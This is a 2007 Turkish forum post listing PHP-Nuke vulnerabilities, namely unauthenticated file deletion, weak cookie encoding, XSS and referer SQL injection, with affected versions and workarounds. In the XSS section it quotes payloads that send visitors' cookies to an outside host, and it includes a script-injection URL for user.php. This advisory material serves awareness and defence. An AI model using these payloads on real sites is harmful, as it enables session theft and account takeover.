12-03-2007, 06:52 | #1 |
PHP-Nuke AçıkLarı...!!!
Corbada Birazda Bizim Tuzumuz OLsun Php TabanLi SiteLerin AcikLari..
1-) PHP Nuke dosya kopyalama ve silme açığı PHP Nuke, PHP script dili ile uygulanmış bir web portal yaratma ve yönetim paketidir. Varsayılan kurulum ile, sunucu dosya sistemindeki dosyaları kopyalama ve silmede kullanılabilen 'admin/case/case.filemanager.php' script`i gelmektedir. Script, sadece kimlik tanılamasında sorumlu bir administrative script`ten çağrıldığına emin olan bir kod içeriyor fakat bunun uygulanışı hatalı. Sonuç olarak uzaktaki herhangi bir kullanıcı kimlik tanılaması olmadan direk olarak script`i çağırabilir ve script`in çalıştığı kullanıcı haklarına göre sunucu üzerinde herhangi bir dosyayı kopyalayabilir, silebilir. Çözüm: Magnux Software aşağıdaki çözümü önermiş: Web sunucusu dosya sistemine erişimi engellemek için aşağıdaki komutlar kullanılabilir: # cd php-nuke-document-root # chmod 0 admin/case/case.filemanager.php Henüz bir yama çıkmadı 2-)PHP Nuke kullanıcı cookie`si zayıf kriptolama açığı Bir kullanıcıya PHP-Nuke tabanlı bir sayfada kimlik tanılaması uygulandığında kullanıcı hesabı ve şifreyi içeren bir cookie yaratılıyor. Şifre 'Base 64 encoding' ile kodlanıyor ve cookie içeriğine erişebilen herkes tarafından kolaylıkla dekod edilebilir. Bunun sonucunda kullanıcının hesabının ele geçirilmesi mümkün. PHP-Nuke`un eski sürümlerininde bu açıktan etkilenmesi muhtemel. PostNuke 0.6.4`de bu açıktan etkileniyor. Çözüm: Henüz bir yama çıkmadı 3-)PHP-Nuke çapraz site betik çalıştırma açıkları PHP-Nuke'da çeşitli çapraz site betik çalıştırma (XSS-Cross Site Scripting) açıkları olduğu rapor edildi. Bir saldırgan, kullanıcıların kötü amaçlı bir linki ziyaret etmesini sağlayarak bu açıktan yararlanabilir. Saldırganın sağladığı HTML ve betik kodu web istemcisinde çalıştırılabilir. Saldırganlar bu açığı web içeriğini farklı göstermek veya çerez-tabanlı kimlik tanılama bilgilerini çalmak için kullanabilirler. öRNEK; Kod:
Aşağıdaki örnekler Matthew Murphy tarafından sağlanmış: <SCRI*PT>location.href="http://www.techie.hopto.org/fetch.php? [email protected]&ref="+document.URL+"cookie="+document.cookie; <B STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/ [email protected]&ref=\'+document.URL+\'cookie=\'+ document.cookie'))">Bold text -- or an attack?</B> <B ONCLICK="location.href='http://www.techie.hopto.org/fetch.php? [email protected]&ref='+document.URL+'cookie='+document.cookie"> Don't Click</B> <B ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php? [email protected]&ref='+document.URL+'cookie='+document.cookie">Keep Away!</B> Henüz bir yama çıkmadı. Açığı gerçekleştirme Yerel: Hayır Uzaktan: Evet Etkilenen Sistemler Etkilenenler: Francisco Burzi PHP-Nuke 5.0 Francisco Burzi PHP-Nuke 5.0.1 Francisco Burzi PHP-Nuke 5.1 Francisco Burzi PHP-Nuke 5.2 a Francisco Burzi PHP-Nuke 5.2 Francisco Burzi PHP-Nuke 5.3.1 Francisco Burzi PHP-Nuke 5.4 Francisco Burzi PHP-Nuke 5.5 Francisco Burzi PHP-Nuke 5.6 Francisco Burzi PHP-Nuke 6.0 Francisco Burzi PHP-Nuke 6.5 BETA 1 4-)PHP-Nuke HTTP "referer" SQL sorgusu ekleme açığı HTTP başlığının referer alanında gönderilen veriler, index.php dosyasında SQL sorgusunda kullanılmadan önce doğru olarak filtrelenmiyor. Açığın 7.9 sürümünde olduğu onaylandı ve 8.0 sürümünün de etkilendiği rapor edildi. Diğer sürümler de etkileniyor olabilir. Çözüm: index.php kaynak kodunda değişiklik yaparak doğru filtrelemenin yapılmasını sağlayın. Etkilenen Sistemler Etkilenenler: PHP-Nuke 5.x PHP-Nuke 6.x PHP-Nuke 7.x PHP-Nuke 8.x Bu SistemLe Bana SaLdirmisLardi SQL Den 2-3 Dosya SiLindi YedekLe Kurtardim 5-)PHP-Nuke Signature alanı XSS açığı PHP-Nuke'ta yeni bir çapraz site betik çalıştırma açığı bulunduğu rapor edildi. Web isteklerinin düzgün kontrol edilmemesi sonucu betik kodlarının PHP script isteklerine gömülmesi mümkün oluyor. Bu sayede uzaktaki bir saldırgan çerez-tabanlı kimlik tanılama bilgilerini çalabilir. Çözüm: Henüz bir yama çıkmadı. Açığı gerçekleştirme Yerel: Hayır Uzaktan: Evet Etkilenen Sistemler Etkilenenler: Francisco Burzi PHP-Nuke 6.0 Francisco Burzi PHP-Nuke 6.5 BETA 1 6-)PHPNuke Cross-Site Scripting güvenlik açığı PHPNuke cross-site scripting açığından etkileniyor. Kötü amaçlı script kodunu içeren PHPNuke kullanıcı bilgileri sayfası user.php`ye bir link yaratmak mümkün. Durumdan şüphelenmeyen bir web kullanıcısı linke tıkladığında kötü amaçlı kod çalışıyor. Bu saldırı ile bir kullanıcının, etkilenen PHPNuke sitesine ait cookie`lerdeki kimlik tanılama bilgileri çalınabilir. PostNuke`un da etkilendiği rapor edildi. Aşağıdaki örnek bir alarm kutusunu görüntülenmesini sağlıyor: http://phpnukesite/user.php?op=userinfo&uname=<script>alert(document. cookie);</script> Çözüm: Geçici çözüm: Web browser`ın özelliklerini kullanarak JavaScript çalıştırılmasını kapatın. Henüz bir yama çıkmadı. Etkilenen Sistemler Etkilenenler: Francisco Burzi PHP-Nuke 1.0 Francisco Burzi PHP-Nuke 2.5 Francisco Burzi PHP-Nuke 3.0 - Linux kernel 2.2 Francisco Burzi PHP-Nuke 4.0 Francisco Burzi PHP-Nuke 4.3 Francisco Burzi PHP-Nuke 4.4 Francisco Burzi PHP-Nuke 4.4.1a Francisco Burzi PHP-Nuke 5.0 Francisco Burzi PHP-Nuke 5.0.1 Francisco Burzi PHP-Nuke 5.1 Francisco Burzi PHP-Nuke 5.2a Francisco Burzi PHP-Nuke 5.2 Francisco Burzi PHP-Nuke 5.3.1 Francisco Burzi PostNuke 0.62 - Apache Group Apache 1.3.20 - Apache Group Apache 1.3.20win32 Francisco Burzi PostNuke 0.63 - Apache Group Apache 1.3.20 - Apache Group Apache 1.3.20win32 Francisco Burzi PostNuke 0.64 - Apache Group Apache 1.3.20 - Apache Group Apache 1.3.20win32 |
|
|
|
12-03-2007, 11:14 | #2 |
teşekkürler çünkü bu sitelerin vb den az açıkları var ve bulunması vb den zor.....
|
|
Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
|
|